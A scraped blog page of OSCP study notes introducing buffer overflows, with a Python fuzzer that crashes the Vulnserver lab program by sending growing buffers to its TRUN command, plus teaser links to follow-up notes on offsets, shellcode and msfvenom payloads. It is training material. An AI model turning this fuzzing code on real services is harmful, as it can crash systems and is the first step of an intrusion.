Introduction to Buffer Overflows

Anatomy of Memory

Anatomy of the Stack

Fuzzing

Tools: Vulnserver - https://github.com/stephenbradshaw/vulnserver

Immunity Debuger - https://www.immunityinc.com/products/debugger/

Vulnserver Test

1. Open the vulnserver program on windows os.

2. Connect to the vulnserver from Kali Linux.

nc -nv 10.0..XX

3.Write the Python fuzzer test script on Kali Linux

 #!/usr/bin/python

 import socket

 import sys

 buffer=["A"]

 counter=100

 while len(buffer) <= 30:

     buffer.append("A"*counter)

     counter=counter+200

 for string in buffer:

     print "Fuzzing vulnserver with %s bytes" % len(string)

     s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

     connect=s.connect(('10.0.0.XX',9999))

     s.send('TRUN /.:/' + string)

     s.close()

Grant the rights to the script file and execute the fuzzer.py.

chmod  fuzzer.py
./fuzzer.py

The vulnserver crashed with 5900 bytes.

Immunity Debuger

GUI Screenshoot

Open or attach the vulnserver program.

Perform the fuzzer.py on Kali Linux.

./fuzzer.py

The vulnserver crashed finally.

OSCP Learning Notes - Buffer Overflows(1)的更多相关文章

  1. OSCP Learning Notes - Buffer Overflows(3)

    Finding Bad Characters 1. Find the bad charaters in the following website: https://bulbsecurity.com/ ...

  2. OSCP Learning Notes - Buffer Overflows(2)

    Finding the Offset 1. Use the Metasploite pattern_create.rb tool to create 5900 characters. /usr/sha ...

  3. OSCP Learning Notes - Buffer Overflows(5)

    Generating Shellcode & Gaining Root 1.Generate the shellcode on Kali Linux. LHOST is the IP of K ...

  4. OSCP Learning Notes - Buffer Overflows(4)

    Finding the Right Module(mona) Mona Module Project website: https://github.com/corelan/mona 1. Downl ...

  5. OSCP Learning Notes - Overview

    Prerequisites: Knowledge of scripting languages(Bash/Pyhon) Understanding of basic networking concep ...

  6. OSCP Learning Notes - Exploit(3)

     Modifying Shellcode 1. Search “vulnserver exploit code” on the Internet. Find the following website ...

  7. OSCP Learning Notes - Post Exploitation(1)

    Linux Post Exploitation Target Sever: Kioptrix Level 1 1. Search the payloads types. msfvenom -l pay ...

  8. OSCP Learning Notes - Privilege Escalation

    Privilege Escalation Download the Basic-pentesting vitualmation from the following website: https:// ...

  9. OSCP Learning Notes - Netcat

    Introduction to Netcat Connecting va Listening Bind Shells Attacker connects to victim on listening ...

随机推荐

  1. webpack简单笔记

    本文简单记录学习webpack3.0的笔记,已备日后查阅.节省查阅文档时间 安装 可以使用npm安装 //全局安装 npm install -g webpack //安装到项目目录 npm insta ...

  2. python 获取两位的月份(09)和天数(09)

  3. Mysql和Redis数据同步策略

    为什么对缓存只删除不更新 不更新缓存是防止并发更新导致的数据不一致. 所以为了降低数据不一致的概率,不应该更新缓存,而是直接将其删除, 然后等待下次发生cache miss时再把数据库中的数据同步到缓 ...

  4. Java中的I/O流全汇总,所有的I/O就一张图

    放大再看,注意视力!哈哈   一口吃不成胖子,一点一点的看: 大家都是文化人,拿图要指明出处!!!  头上↑那框,对,就是那 使用的是XMind软件画的,要源文件吗? 在这里:https://gith ...

  5. (一)、Java内存模型

    简述 Java虚拟机规范中试图定义一种Java内存模型(Java Memory Model,JMM),来屏蔽掉各种硬件和操作系统的内存访问差异,以实现让Java程序在各种平台下都能达到一致的内存访问效 ...

  6. Halcon斑点分析官方示例讲解

    官方示例中有许多很好的例子可以帮助大家理解和学习Halcon,下面举几个经典的斑点分析例子讲解一下 Crystals 图中显示了在高层大气中采集到的晶体样本的图像.任务是分析对象以确定特定形状的频率. ...

  7. String类基础知识

    1.String类的构造方法 (1)String(String original)  //把字符串数据封装成字符串对象 (2)String(char[] c)   //把字符数组的数据封装成字符串对象 ...

  8. Python学习笔记——基础语法篇

    一.Python初识(IDE环境及基本语法,Spyder快捷方式) Python是一种解释型.面向对象.动态数据类型的高级程序设计语言,没有编译过程,可移植,可嵌入,可扩展. IDE 1.检查Pyth ...

  9. MFC线程(二):线程同步临界区CRITICAL SECTION

    当多个线程同时使用相同的资源时,由于是并发执行,不能保证先后顺序.所以假如时一个公共变量被几个线程同时使用会造成该变量值的混乱. 下面来举个简单例子. 假如有一个字符数组变量 char g_charA ...

  10. Vue.js 组件复用和扩展之道

    软件编程有一个重要的原则是 D.R.Y(Don't Repeat Yourself),讲的是尽量复用代码和逻辑,减少重复.组件扩展可以避免重复代码,更易于快速开发和维护.那么,扩展 Vue 组件的最佳 ...